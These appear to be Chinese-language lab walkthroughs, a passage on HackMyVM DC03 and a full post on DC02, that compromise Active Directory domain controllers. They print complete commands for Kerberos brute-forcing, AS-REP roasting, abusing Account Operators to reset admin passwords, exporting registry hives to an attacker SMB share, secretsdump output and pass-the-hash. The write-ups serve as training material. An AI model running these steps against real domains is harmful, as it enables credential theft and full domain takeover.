“密码暴力破解” 的操作，核心目的是通过字典攻击尝试获取该用户的明文密码。ntpdate 192.168.215.25 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v13.9 nxc爆破smb使用nxc内网渗透神器，使用相同的账号密码爆破smb服务器，全部失败13.10 获取不需要预认证用户的AS-REP哈希全部没有impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt利用之前得到的密码 xkate578:jesuschristldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt 参数 作用 -x 使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址（这里是域控的 IP）。 -D "xkate578@SOUPEDECODE.LOCAL" 绑定的用户 DN（用户名），即使用 xkate578 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码（xkate578 的密码）。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN（域的根目录），即从整个域范围查询。 "sAMAccountName=xkate578" 过滤条件：只查询 sAMAccountName 为 xkate578 的用户（精准定位自身）。 memberOf 只返回该用户的 memberOf 字段（即所属的组）。 > ldap_result.txt 将结果输出到文件，方便查看。 从结果中可以看到这个用户属于Account Operators 组作用： 创建 / 修改 / 删除普通域用户账号可在域内新增用户（如 testuser）、修改现有用户的属性（如密码、登录脚本、所属组等），但不能修改域管理员（Domain Admins）等高级账号。 管理用户组（非特权组）可创建新的普通用户组，或修改普通组的成员（如将 zximena448 加入某个组），但不能修改 Domain Admins、Enterprise Admins 等特权组。 重置普通用户密码可强制重置普通域用户的密码（无需知道原密码），例如将 zximena448 的密码改为 hacked123，进而控制该账号。 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限，可获取更多域内账号的属性（如密码过期时间、登录次数等）。 尝试利用net命令和这些凭证，向目标域添加一个用户，然后使用evil-winrm连接的时候，连接不上net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'将用户添加到远程管理组即可使用evil-winrm连接net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'那么尝试添加管理员组呢？很明显，之前已经说过了，Account Operators组的用户，可创建新的普通用户组，或修改普通组的成员（如将 zximena448 加入某个组），但不能修改 Domain Admins、Enterprise Admins 等特权组。再看看管理员组有哪些用户，一个是Operators，一个是Administrator，两个用户属于超级管理员’ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name从 LDAP 查询结果中，有几个关键线索表明 Operators 是自定义组而非 Windows 内置组：Windows 内置操作员组都有特定的前缀： Backup Operators Print Operators Server Operators Account Operators 而这里发现： 组名：Operators（没有前缀） 这不符合 Windows 内置组的命名规范 sAMAccountName 分析ldif# Operators, Users, SOUPEDECODE.LOCAL dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL name: Operators sAMAccountName: Operators关键点： sAMAccountName: Operators（没有数字后缀） Windows 内置组通常有特定的 sAMAccountName 格式 例如内置的 Account Operators 的 sAMAccountName 是 Account Operators 另外# 内置组通常在 Builtin 容器中 dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name# Account Operators 不能重置这些直接组成员的密码： - 直接属于 Administrators 的用户 - 直接属于 Domain Admins 的用户 # 但可以重置这些用户的密码： - 通过组嵌套获得管理员权限的用户 - 属于自定义管理组的用户再不清楚，就是这个链路Domain Admins (域管理员组) ↑ 包含 Operators (自定义管理组) ↑ 包含 fbeth103 (普通用户) xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码（回家重装了靶机，ip变了）net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102 # 或者 [root@kali] /home/kali/DC03 ❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎ rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!" rpcclient $> # 然后连接 evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'此时就已经得到了最后的root.txt内容它这个自定义既然组隶属于管理员组，那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢？现在试试┌──(root㉿kali)-[~] └─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102 ┌──(root㉿kali)-[~] └─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami soupedecode\administrator 成功修改！都不需要去PTH（哈希传递攻击）了13.11 PTH攻击（hash传递）Secretdump获取域内hashimpacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.10213.12 工具推荐 ldapdomaindump除了ldapsearch工具之外，还有一个工具也可以看域内组织情况，叫做ldapdomaindumpldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102在生成的domain_groups.html中也能看到Operators属于Domain Admins组从这里也能看到fbeth103属于Operators组用这个工具更为方便13.13 DC03 域渗透总结本次 DC03 域渗透从外网打点开始，先通过 nmap 扫描确定目标为域控制器，开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后，用 kerbrute 枚举到 charlie、administrator 等用户，爆破无果后通过 Responder 进行 LLMNR 投毒，捕获到 xkate578 的 NTLM 哈希并破解出密码。利用 xkate578（属 Account Operators 组）的账号管理权限，先创建影子账号并加入远程管理组，成功登录后枚举域内用户，发现自定义组 Operators 隶属于 Domain Admins，且包含用户 fbeth103。重置 fbeth103 密码并登录，利用其间接域管理员权限，成功修改 Administrator 密码，获取域控最高权限，最终找到 root.txt，全程未依赖复杂漏洞，主要通过权限嵌套与凭据复用推进。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC02 ：中等 中途可能会切换好几次IP，但是都是同一个靶机，我自己网络不稳定，或者机器环境有问题，重装导致的，不用管IP的变化12.1 端口扫描这里使用nmap进行全端口扫描，识别目标开放的服务和操作系统信息nmap -sS -p- -T4 192.168.219.240 -A端口53：DNS服务，用于域名解析 端口88：Kerberos认证，域用户登录验证 端口139/445：SMB文件共享服务 端口389：LDAP目录服务，存储用户信息 端口636：安全的LDAP 端口5985：WinRM远程管理 这些端口组合表明这是一个域控制器！12.2 enum4Linux枚举使用enum4Linux-ng通过 LDAP/SMB/RPC 等协议枚举目标系统信息（是enum4Linux的升级版，现在有社区维护，老版已不再维护）enum4Linux-ng -A 192.168.219.240 -C工具作用：通过 SMB/LDAP/RPC 等协议自动枚举 Windows 域环境信息12.3 尝试使用匿名登录目的：检查是否允许匿名访问SMB共享 结果：需要认证，匿名访问被拒绝smbclient -L //192.168.219.227/ -N12.4 kerberos 用户名枚举字典使用的是seclist，总共发现了3个用户，admin / zximena448 / charliekerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt --dc 192.168.219.227kerbrute：一款用于Kerberos用户枚举和密码爆破的工具。userenum：用户枚举模式。-d SOUPEDECODE.LOCAL：指定域名。/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt：用户名字典路径。--dc 192.168.219.240：指定域控制器的IP地址。12.5 爆破 kerberos 协议爆破kerberos 协议的时候，需要同步时间（Kerberos要求时间偏差在5分钟内）ntpdate 192.168.219.227 # 将本地时间与目标域控制器同步 kerbrute bruteuser --dc 192.168.219.227 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt charlie -v# 参数解析 bruteuser：针对单个用户进行密码爆破 --dc 192.168.219.240：域控制器IP -d SOUPEDECODE.LOCAL：域名 /usr/share/...usernames-dup.txt：密码字典（这里误用了用户名字典，应该用密码字典） charlie：目标用户名 -v：详细输出模式如果不同步时间就会出现如下结果为什么需要同步时间？Kerberos 认证流程中，客户端向 KDC（域控制器）请求票据（如 AS-REQ）时，会在请求中包含当前时间戳，KDC 收到请求后会：检查客户端时间戳与自身系统时间的偏差是否在允许范围内（默认通常为 5 分钟，由域策略 Maximum tolerance for computer clock synchronization 控制）。若偏差超过阈值，KDC 会直接拒绝请求，返回错误 KDC_ERR_CLOCK_SKEW_TOO_GREAT（时钟偏差过大）。有了账号密码charlie/charlie，登录smb服务使用evil-winrm远程连接服务器（类似于3389端口的rdp远程连接），这个服务运行在5985端口evil-winrm -i 192.168.219.227 -u charlie -p charlie12.6 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果impacket-GetUserSPNs -request -dc-ip 192.168.219.227 SOUPEDECODE.LOCAL/charlie:charlie12.7 枚举域内用户SID再由于目标域不支持匿名登录（包括smb）所以不能使用-no-pass参数来枚举这个域的SID核心作用是通过 SMB/LDAP 协议查询目标系统的SID SMB/LDAP 及其账号和组信息python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 -no-passSID遍历，枚举域内用户，使用账号密码charlie:charlie（看看charlie这个用户有没有权限查看SID）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240正常枚举域内用户信息，把它归纳成一个字典python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 > user # 将枚举出来的用户都筛选出来，去掉多余字符 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt12.8 获取不需要预认证用户的AS-REP哈希正常情况下，银行（KDC）会强制要求你提供 “加密时间戳”（预认证）才给你凭证 —— 但如果某个用户的 “银行卡设置” 里，把 “必须要预认证” 这个选项关了（域用户未启用 Kerberos 预认证），会发生什么？→ 你不用提供 “加密时间戳”，只要报出 “身份证号”（用户名），银行就直接把 “加密的取钱凭证”（AS-REP 票据）给你了！→ 拿到这张凭证（AS-REP 哈希）后，你就可以拿回家 “慢慢试密码”（用 hashcat/john 爆破）—— 反正凭证是加密的，试错不会被银行发现（不会触发账号锁定）。这就是为什么要找 “不需要预认证的用户”：能无风险、无凭证地拿到他的 AS-REP 哈希，进而破解出明文密码。impacket-GetNPUsers -dc-ip 192.168.219.240 soupedecode.local/ -usersfile target_users.txt > hash12.9 AS-REP哈希爆破使用hashcat爆破不需要预认证的AS-REP哈希结果hashcat -a 0 -m 18200 res.txt /usr/share/wordlists/rockyou.txt提示，设备 #1：此次攻击所需的可分配设备内存不足，切换爆破工具john得到密码internet，那么配合前面的账号密码就是zximena448 ：internet ，再次远程连接evil-winrm -i 192.168.219.240 -u zximena448 -p internet使用smbclient连接smb服务，查看有什么东西smbclient -L //192.168.219.240/ -U zximena448使用这个用户连接C$这个smb共享文件夹再连接ADMIN$这个共享文件夹，也能连接（不过没有发现什么可用的文件）在C$共享文件夹中找到flag用 zximena448 账号查询域内用户信息，获取高权限账号（如 Administrator）的线索。12.10 收集 LDAP 信息目的：获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。必要性：没有域内用户信息，后续攻击会盲目尝试，效率极低。前提：拥有至少一个有效的域内用户凭证（如 zximena448:internet），且域控的 LDAP 端口（389）开放。原理：域内普通用户默认有权限查询 LDAP 目录的基础信息。命令如下ldapsearch -x -H ldap://192.168.219.240 -D "zximena448@SOUPEDECODE.LOCAL" -w 'internet' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=zximena448" memberOf > ldap_result.txt -x 使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址（这里是域控的 IP）。 -D "zximena448@SOUPEDECODE.LOCAL" 绑定的用户 DN（用户名），即使用 zximena448 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码（zximena448 的密码）。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN（域的根目录），即从整个域范围查询。 "sAMAccountName=zximena448" 过滤条件：只查询 sAMAccountName 为 zximena448 的用户（精准定位自身）。 memberOf 只返回该用户的 memberOf 字段（即所属的组）。 > ldap_result.txt 将结果输出到文件，方便查看。 发现zximena448 属于 Backup Operators 组，Backup Operators 是 Windows 域内置的特权组，默认被赋予了 “备份 / 恢复域控系统数据” 的核心权限，而 “备份数据” 的权限恰好覆盖了域控的敏感文件（如存储账号哈希的 NTDS.dit、注册表 SAM/SYSTEM 等）。攻击方式：在 kali 上启动 SMB 服务，用于接收从目标机器导出的敏感文件（如注册表备份）。impacket-smbserver -smb2support "share" .前提：kali 的 SMB 端口（445）未被占用，且目标域控能访问 kali 的 IP（网络连通性）。原理：通过 SMB 协议实现文件共享，方便接收从目标导出的备份文件。12.11 导出注册表备份文件通过 impacket-reg 从域控（192.168.219.240）导出 SYSTEM/SAM/SECURITY 注册表文件（含加密的凭证信息）。impacket-reg "soupedecode.local"/"zximena448":"internet"@"192.168.219.240" backup -o '\\192.168.219.37\share'前提：拥有的域用户（zximena448）需具备读取域控注册表的权限（普通用户可能无此权限，此处可能因目标配置宽松成功）。原理：通过远程注册表服务导出系统关键注册表文件。此时smb服务的回显，备份文件，从域控服务器中传过来成功搭建 SMB 共享 + 导出注册表备份目的：SYSTEM/SAM/SECURITY 注册表文件存储了系统加密的凭证（用户哈希、机器账户哈希等），导出后可离线解密。必要性：直接在域控上提取哈希可能触发告警，通过备份文件离线处理更隐蔽。就能看到开启smb共享文件夹的路径下面多了几个文件12.12 用 secretsdump.py 解密备份文件提取本地管理员哈希和机器账户（DC01$）哈希。目的：从备份文件中提取可直接用于攻击的哈希值（如 DC01$ 机器账户哈希、本地管理员哈希）。必要性：原始注册表文件是加密的，必须用 secretsdump 结合 bootKey 解密才能得到可用的哈希。python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local前提：获取 SYSTEM/SAM/SECURITY 备份文件（本地解密），或拥有目标机器的管理员权限 / 机器账户哈希（远程导出）。原理：利用 Windows 的加密机制，通过 bootKey 解密哈希存储区。┌──(root㉿kali)-[/data/demo] └─# python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:45820dc9be5c067950d71e306d3d14084a9a8a3f8e99d7c1f6074080bec85f7c2645011e654397553bc7cad19277e361caaee722709bdaf3bbcbd9f2d0c73b8cf27651387c664ede1f3f7d6845f7d14293fdbcda34eb89d5c665de89860a23833a531ee43e6841b586896e6dbef6ac4e16196af3c6e2070ca148d032697b02bca95820d079296377ba4df3c4201dd419d89b9357bf470139b53d31761452e0f94ae9273a16c3d43ae2404740b5ac085992a092187c1fc6a59d5edb24e8cd8aae2575639cadc4cc18c7c5e5e07f5bf06a6154bb92a1dbcbf00f5b6b3171cd5df73121e0afca158f50df3f3db64c9dad11 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:4408da87fddde5ecdffe27d1d8255bc1 [*] DPAPI_SYSTEM dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4 dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503 [*] NL$KM 0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../... 0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!. 0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c. 0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n... NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991 [*] Cleaning up...12.13 哈希传递攻击（PTH）目的：无需明文密码，直接用哈希值认证并横向移动到域控（DC01$ 是域控的机器账户，默认有高权限）。必要性：多数情况下无法获取明文密码，PTH 是域内横向的核心手段。前提：目标开启 SMB 服务（445 端口），且未禁用 NTLM 认证（默认启用）。原理：通过 NTLM 协议，用哈希替代明文密码完成认证。用 nxc 验证 DC01$ 哈希的有效性，确认可横向到域控。nxc smb 192.168.219.240 -u target_users.txt -H 4408da87fddde5ecdffe27d1d8255bc1用 DC01$ 哈希通过 secretsdump.py 导出域内所有用户哈希（包括 Administrator）。通过 DC01$ 权限导出域内所有用户哈希（包括 Administrator），最终用管理员权限登录域控，实现对整个域的控制。python /usr/share/doc/python3-impacket/examples/secretsdump.py soupedecode.local/'DC01$'@192.168.219.240 -hashes :4408da87fddde5ecdffe27d1d8255bc112.14 完成渗透用 Administrator 哈希通过 evil-winrm 登录域控，完成渗透。前提：域控开启 WinRM 服务（5985/5986 端口），且拥有管理员级别的哈希或明文密码。原理：通过 WinRM 协议远程执行命令，类似 SSH 但针对 Windows。evil-winrm -i 192.168.219.240 -u Administrator -H 8982babd4da89d33210779a6c5b078bd12.15 总结从用户枚举到密码爆破获取初始凭证，通过AS-REP Roasting获取更高权限账户，利用注册表备份提取机器账户哈希，最终通过哈希传递攻击实现域控完全控制。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透